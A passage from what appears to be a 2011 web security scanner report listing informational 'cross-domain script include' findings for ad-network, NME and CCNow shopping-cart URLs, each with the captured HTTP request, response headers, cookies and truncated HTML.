GET /if?enc=XHLcKR2syT9cctwpHazJPwAAACAEVvI_XHLcKR2syT9cctwpHazJP0YIgIiop3FfSsYda6b2ziWz88dNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAmA8AAgMCAAUAAAAAOCNlQgAAAAA.&udj=uf%28%27a%27%2C+577%2C+1304949676%29%3Buf%28%27r%27%2C+184995%2C+1304949676%29%3B&cnd=!Wx_b0wjC6AIQo6ULGAAg8dUBKAAxXXLcKR2syT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-ELG5AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC&referrer=http://www.thevine.com.au HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anj=Kfw)(CZ#0c)_Vsd7xrIB//C+rXs=j-NmSHESbuj(Xfy%gQ8(_!$Qn`j>l!w]Qc4sqiteE')fkA#BuR9S#?g?x96rwk*ZwCg%AAgCaQC9oD/Z'3KOz[NgtOXq7:8zNI%RI]VLxSk0/<ReOqu`kW+mpt*RcdU`309#Npmqz:f120r*CIweF>wD.dc[jewf7Jg1C%'=:^a?O!THxg^g6]dlW4kBRMj<u?URG7od_TaFgZ6+E*Ien0D+8EWfv:I`ua'+iw%6g8[*WG-xb.gqGglNq=ppU9pMi>NhIWtG!c<-Hz]x$Nj*ieT0/DS+p9-9itwW.^@-FVBcEA%SQ3D#EVY@pHSJKc1qYrpTfZ+^5CoqqS0JzwnQMX0h^)-5M6iw68MyaTc`NLmrB$Up8jXday>aPC4HGACKGA<XW6tO(HpUYp@EZKc@qTY<b(XFqNJ5Lo(Q%@XrX2UOpjstXFBy^^OTow.15i]1m'KEuj>:`7Jfb$qToO]KZDC!p(2=spx-Wkmic-P-=$d<X]p6j]/LnTgv#/BjiE%RGEQhY)+`5Iw`Y.[O0:ufI'/oAjfj5OJE@2X-prW^X0@]6u9gl4:1lI9Pi)1j^Mc@XYz4^70y1M0s_2Y`wz]XIhEQ_(; sess=1; uuid2=2724386019227846218; icu=ChII-YMBEAoYASABKAEwy-af7gQKEgjxlQEQChgCIAIoAjC055_uBBC055_uBBgC

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 14:01:25 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:01:25 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:01:25 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0c)_Vsd7xrIB//C+rXs=j-NmSHESbuj(Xfy%gQ8(_!$Qn`j>l!w]Qc4sqiteE')fkA#BuR9S#?g?x96rwk*ZwCg%AAgCaQC9oD/Z'3KOz[NgtOXq7:8zNI%RI]VLxSk0/<ReOqu`kW+mpt*RcdU`309#Npmqz:f120r*CIweF>wD.dc[jewf7Jg1C%'=:^a?O!THxg^g6]dlW4kBRMj<u?URG7od_TaFgZ6+E*Ien0D+8EWfv:I`ua'+iw%6g8[*WG-xb.gqGglNq=ppU9pMi>NhIWtG!c<-Hz]x$Nj*ieT0/DS+p9-9itwW.^@-FVBcEA%SQ3D#EVY@pHSJKc1qYrpTfZ+^5CoqqS0JzwnQMX0h^)-5M6iw68MyaTc`NLmrB$Up8jXday>aPC4HGACKGA<XW6tO(HpUYp@EZKc@qTY<b(XFqNJ5Lo(Q%@XrX2UOpjstXFBy^^OTow.15i]1m'KEuj>:`7Jfb$qToO]KZDC!p(2=spx-Wkmic-P-=$d<X]p6j]/LnTgv#/BjiE%RGEQhY)+`5Iw`Y.[O0:ufI'/oAjfj5OJE@2X-prW^X0@]6u9gl4:1lI9Pi)1j^Mc@XYz4^70y1M0s_2Y`wz]XIhEQ_(; path=/; expires=Sun, 07-Aug-2011 14:01:25 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 09 May 2011 14:01:25 GMT
Content-Length: 530

<script language="JavaScript" src="http://mf.sitescout.com/tag.jsp?pid=0C66F16&w=728&h=90&rnd=1304949683&cm=http://ib.adnxs.com/click/XHLcKR2syT9cctwpHazJPwAAACAEVvI_XHLcKR2syT9cctwpHazJP0YIgIiop3FfSsYda6b2ziWz88dNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAmA8AAQMCAAUAAAAANyNUQgAAAAA./cnd=!Wx_b0wjC6AIQo6ULGAAg8dUBKAAxXXLcKR2syT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-ELG5AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC/referrer=http%3A%2F%2Fwww.thevine.com.au/clickenc="></script>

16.8. http://media.adfrontiers.com/pq

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.adfrontiers.com
Path:   /pq

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pq?t=f&s=923&ts=1304949604772&cm=1148&ac=5&at=1&xvk=60302672.07185271&fd=t&tc=1&rr=t HTTP/1.1
Host: media.adfrontiers.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tc=1; af="3|!RglRcjj3oVAzGl,hfn!gk!!77,-1066|3142|618|1|1304340985980|26|3|0:349|2477|618|1|1304340397914|26|3|0:349|1148|1484|1|1304949604776|25|2|0:-"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private, no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 01 Jan 2000 00:00:00 GMT
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Set-Cookie: af="3|!RglRcjj3oVAzGl,hfn!gk!!77,-1066|3142|618|1|1304340985980|26|3|0:349|2477|618|1|1304340397914|26|3|0:349|1148|1484|1|1304949604776|25|2|0:-"; Version=1; Domain=media.adfrontiers.com; Max-Age=2592000; Path=/
Content-Type: text/html
Content-Length: 771
Date: Mon, 09 May 2011 14:00:09 GMT
Connection: close

<html><head>
<title>Adv.com 2010 - FCap 3/24 728x90</title>
</head><body marginwidth=0 marginheight=0 leftmargin=0 topmargin=0 style="background-color:transparent">
<script type='text/javascript'>
v
...[SNIP]...
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

16.9. http://r1-ads.ace.advertising.com/site=743832/size=728090/u=2/bnum=29047542/hr=9/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.floridatoday.com%252Farticle%252F20110508%252FNEWS01%252F105080319%252FHighly-publicized-murder-Caylee-Anthony-rivets-enrages

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=743832/size=728090/u=2/bnum=29047542/hr=9/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.floridatoday.com%252Farticle%252F20110508%252FNEWS01%252F105080319%252FHighly-publicized-murder-Caylee-Anthony-rivets-enrages

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /site=743832/size=728090/u=2/bnum=29047542/hr=9/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.floridatoday.com%252Farticle%252F20110508%252FNEWS01%252F105080319%252FHighly-publicized-murder-Caylee-Anthony-rivets-enrages HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=923&ts=1304949604772&cm=1148&ac=5&at=1&xvk=60302672.07185271&fd=t&tc=1&rr=t
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; F1=B8ziF3kAAAAAgCsCAEAAgEABAAAABAAAAMAAgEA; BASE=Rgwq9yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2unWu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ44q0qPrQrsF+Mlvp1J!; ROLL=boAnq2C+ORAgHEGte/mz/DHyJN5VpuB!; C2=bN/xN5pqDIxFGxkovMg3sYU8SKMCItdBwhQ3WXAcIsY4FAHCw3gBwhQ7NYAcIoLOGAHCKGeBwhwmhXAcI8eDGAHCdDmBwhwohXAcIQY4FAHCYimBwhA3WaAcIoa4FAHCA9qBwhgdeZAcI4fFGAHCbTeBwhwKOaAcIoN5FAHCC9qBwhwtZaAcIE0rGAHCFBqBwhQTaaAcIY4dGAHCNLqBwVrqDoxsGFftrSQIzaQHRGABg2cxFZm5IaMJxOCBsRphd0I9HsfzFz+i4SQBwWkTltCqGXFseSw7RaIXVSPBrLqRONJUEQT2FyFruTQAzZIX0KHBbzqhcl6BE8sXGyFogRwrgYc4zWdBkoqRwM67FcNNGhWkAbwuRXMUumvBEOpR+NLUGsEpGlIq+bQoeZ4jfOsBgwhB3W7/HUJtGTRZpTrxMFqFH09IGrUo8ew5qYITY6wBsMiBqcAnjagKHEv9FoSqGdQ9fZI2FirZDugxkELJI8GlGlE; GUID=MTMwNDk0OTU5NTsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 14:00:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.884214.743832.0XMC
Set-Cookie: F1=Bg28H3kAAAAAYm1CAEAAgEABAAAABAAAAEAAgEA; domain=advertising.com; expires=Wed, 08-May-2013 14:00:08 GMT; path=/
Set-Cookie: BASE=Rgwq9yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2unWu4QL44U5Tp5J7h57WACK9DFolo7ZgEc+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ44q0qPrQrsF+Mlvp1J!; domain=advertising.com; expires=Wed, 08-May-2013 14:00:08 GMT; path=/
Set-Cookie: ROLL=boAno2CkdKAgj1G!; domain=advertising.com; expires=Wed, 08-May-2013 14:00:08 GMT; path=/
Set-Cookie: 29047542=_4dc7f368,4264037248,743832^884214^81^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 09 May 2011 14:00:08 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 601

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.5;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000743832/mnum=0000884214/cstr=29047542=_4dc7f368,4264037248,743832^884214^81^0,1_/xsxdata=$xsxdata/bnum=29047542/optn=64?trg=;ord=4264037248?">');document.write('<\/SCRIPT>
...[SNIP]...

16.10. http://static.nme.com/themes/default/static_images//themes/default/images/footer_bkgrd.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.nme.com
Path:   /themes/default/static_images//themes/default/images/footer_bkgrd.gif

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /themes/default/static_images//themes/default/images/footer_bkgrd.gif HTTP/1.1
Host: static.nme.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=29jkomkf8kicpicajt2rkq4nq6; ignite_loggedin=false; browsertype=web; s_cc=true; s_sq=%5B%5BB%5D%5D; __utmz=112756251.1304949643.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=112756251.356327229.1304949643.1304949643.1304949643.1; __utmc=112756251; __utmb=112756251.2.10.1304949643; rsi_segs=

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
NmeAkamaiMatch: 1
IgniteAkamaiMatch: 1
X-Wf-Protocol-1: http://meta.wildfirehq.org/Protocol/JsonStream/0.2
X-Wf-1-Plugin-1: http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3
X-Wf-1-Structure-1: http://meta.firephp.org/Wildfire/Structure/FirePHP/FirebugConsole/0.1
X-Wf-1-1-1-1: 55|[{"Type":"LOG"},"now: Wed, 13 Apr 2011 14:52:18 +0100"]|
X-Wf-1-1-1-2: 63|[{"Type":"LOG"},"id: 3553292c29d61be30dade092df8597046390d4ea"]|
X-Wf-1-1-1-3: 23|[{"Type":"LOG"},"li: "]|
X-Wf-1-1-1-4: 24|[{"Type":"LOG"},"cs: 1"]|
X-Wf-1-1-1-5: 23|[{"Type":"LOG"},"rc: "]|
X-Wf-1-1-1-6: 24|[{"Type":"LOG"},"ic: 1"]|
X-Wf-1-1-1-7: 28|[{"Type":"LOG"},"ttl: 3640"]|
X-Wf-1-1-1-8: 29|[{"Type":"LOG"},"mu: 786432"]|
X-Wf-1-1-1-9: 41|[{"Type":"LOG"},"ts: 0.0014481544494629"]|
X-Wf-1-1-1-10: 23|[{"Type":"LOG"},"ct: "]|
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: must-revalidate, max-age=345007, post-check=0, pre-check=0
Expires: Fri, 13 May 2011 13:52:24 GMT
Date: Mon, 09 May 2011 14:02:17 GMT
Connection: close
Content-Length: 41093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>NME.COM<
...[SNIP]...
<link href="http://static.nme.com/combined/common/db72101de5d0d948cfe0daf3fbe57d92.print.css" rel="stylesheet" type="text/css" media="print" />

<script type="text/javascript" language="JavaScript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
...[SNIP]...
<!-- Google search box overlays -->
<script type="text/javascript" src="http://www.google.co.uk/cse/brand?form=header-search-box&amp;lang=en"></script>
<script type="text/javascript" src="http://www.google.co.uk/cse/brand?form=footer-search-box&amp;lang=en"></script>
...[SNIP]...

16.11. http://tag.contextweb.com/TagPublish/getad.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getad.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /TagPublish/getad.aspx?tagver=1&ca=VIEWAD&cp=536156&ct=101378&cf=728X90&cn=1&rq=1&dw=1066&cwu=http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2FNEWS01%2F105080319%2FHighly-publicized-murder-Caylee-Anthony-rivets-enrages&mrnd=74482871&if=0&tl=1&pxy=0,0&cxy=1050,3575&dxy=1050,3575&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1; cw=cw

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB23
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2555
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 09 May 2011 14:00:02 GMT
Connection: close
Set-Cookie: V=wOebwAz4UvVv; domain=.contextweb.com; expires=Wed, 09-May-2012 14:00:02 GMT; path=/
Set-Cookie: 536156_4_101378=1304949602182; domain=.contextweb.com; path=/
Set-Cookie: cr=2|1|-8588966416881931568|1%0a15|1|-8588960524833886248|1; domain=.contextweb.com; expires=Thu, 03-May-2012 14:00:02 GMT; path=/
Set-Cookie: vf=1; domain=.contextweb.com; expires=Tue, 10-May-2011 04:00:00 GMT; path=/

var strCreative=''
+ '<script src="http://tag.admeld.com/passback/js/610/gannett/728x90/8/meld.js"></scr'+'ipt>\n'
;
document.write(strCreative);var strCreative=''
+ '<iframe src="http://bh.context
...[SNIP]...

16.12. http://www.ccnow.com/cgi-local/cart.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ccnow.com
Path:   /cgi-local/cart.cgi

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /cgi-local/cart.cgi?2akrshop2_AKR074VINYL HTTP/1.1
Host: www.ccnow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1304949980.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1027269073.1304949980.1304949980.1304949980.1; __utmc=1; __utmb=1.5.10.1304949980; oudelay=1304950305; ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75444E983624DD85F34467139B51A38206;

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:12:25 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Set-Cookie: oudelay=1304950348; domain=www.ccnow.com; path=/; expires=Mon, 09-May-2011 15:12:28 GMT
Set-Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75AC132BC7478C7307DEBD3D97FA4A6E72CA22BF32FAF94F13; domain=www.ccnow.com; path=/; expires=Wed, 08-May-2013 14:12:28 GMT
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 19792

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Shopping cart Experts - CCNow Online Credit Card Processing and Merchant Acc
...[SNIP]...
<!-- -->
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

16.13. http://www.ccnow.com/cgi-local/sc_cart.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ccnow.com
Path:   /cgi-local/sc_cart.cgi

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /cgi-local/sc_cart.cgi?8147444662139294 HTTP/1.1
Host: www.ccnow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB7568A8E92F8CE5F45B4467139B51A38206

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:30 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Set-Cookie: oudelay=1304950050; domain=www.ccnow.com; path=/; expires=Mon, 09-May-2011 15:07:30 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 15270

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Shopping cart Experts - CCNow Online Credit Card Processing and Merchant Acc
...[SNIP]...
<!-- -->
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

16.14. https://www.ccnow.com/cgi-local/cart.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ccnow.com
Path:   /cgi-local/cart.cgi

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /cgi-local/cart.cgi?asmakit_AKR214_http://asthmatickitty.com/ HTTP/1.1
Host: www.ccnow.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB7568A8E92F8CE5F45B4467139B51A38206; oudelay=1304949962

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:44 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Set-Cookie: oudelay=1304950065; domain=www.ccnow.com; path=/; expires=Mon, 09-May-2011 15:07:45 GMT
Set-Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75D81F41DED68942DF4467139B51A38206; domain=www.ccnow.com; path=/; expires=Wed, 08-May-2013 14:07:45 GMT
Keep-Alive: timeout=15, max=150
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 15270

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Shopping cart Experts - CCNow Online Credit Card Processing and Merchant Acc
...[SNIP]...
<!-- -->
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

16.15. https://www.ccnow.com/cgi-local/checkout.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ccnow.com
Path:   /cgi-local/checkout.cgi

Issue detail

The response dynamically includes the following script from another domain:

Request

POST /cgi-local/checkout.cgi HTTP/1.1
Host: www.ccnow.com
Connection: keep-alive
Referer: https://www.ccnow.com/cgi-local/sc_cart.cgi
Cache-Control: max-age=0
Origin: https://www.ccnow.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB7568A8E92F8CE5F45B4467139B51A38206; ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75444E983624DD85F34467139B51A38206; __utmz=1.1304949980.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oudelay=1304950012; __utma=1.1027269073.1304949980.1304949980.1304949980.1; __utmc=1; __utmb=1.3.10.1304949980
Content-Length: 287

action=main&application=sc_cart&appscript=sc_cart.cgi&apptitle=CCNow+Shopping+Cart&auction=0&blocs=US&cids=asmakit&ftotal=1000%2C200%2C0%2C0&gtotal=1200&invoice=0&items=1&platflag=0&platform=Productio
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:52 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Set-Cookie: oudelay=1304950072; domain=www.ccnow.com; path=/; expires=Mon, 09-May-2011 15:07:52 GMT
Keep-Alive: timeout=15, max=150
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 18997

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Shopping cart Experts - CCNow Online Credit Card Processing and Merchant Acc
...[SNIP]...
<!-- -->
<script src="https://ssl.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

16.16. https://www.ccnow.com/cgi-local/sc_cart.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ccnow.com
Path:   /cgi-local/sc_cart.cgi

Issue detail

The response dynamically includes the following script from another domain:

Request

POST /cgi-local/sc_cart.cgi HTTP/1.1
Host: www.ccnow.com
Connection: keep-alive
Referer: https://www.ccnow.com/cgi-local/cart.cgi?asmakit_AKR214_http://asthmatickitty.com/
Cache-Control: max-age=0
Origin: https://www.ccnow.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB7568A8E92F8CE5F45B4467139B51A38206; oudelay=1304949975; ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75444E983624DD85F34467139B51A38206; __utmz=1.1304949980.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1027269073.1304949980.1304949980.1304949980.1; __utmc=1; __utmb=1.1.10.1304949980
Content-Length: 365

seq1_asmakit_pid=AKR214&seq1_asmakit_quan=1&coupon_asmakit=&shipreg_asmakit=BC%3AUS&action=update&application=sc_cart&appscript=sc_cart.cgi&apptitle=CCNow+Shopping+Cart&auction=0&blocs=ZZ&cids=asmakit
...[SNIP]...

Response

HTTP/1.1 200 OK
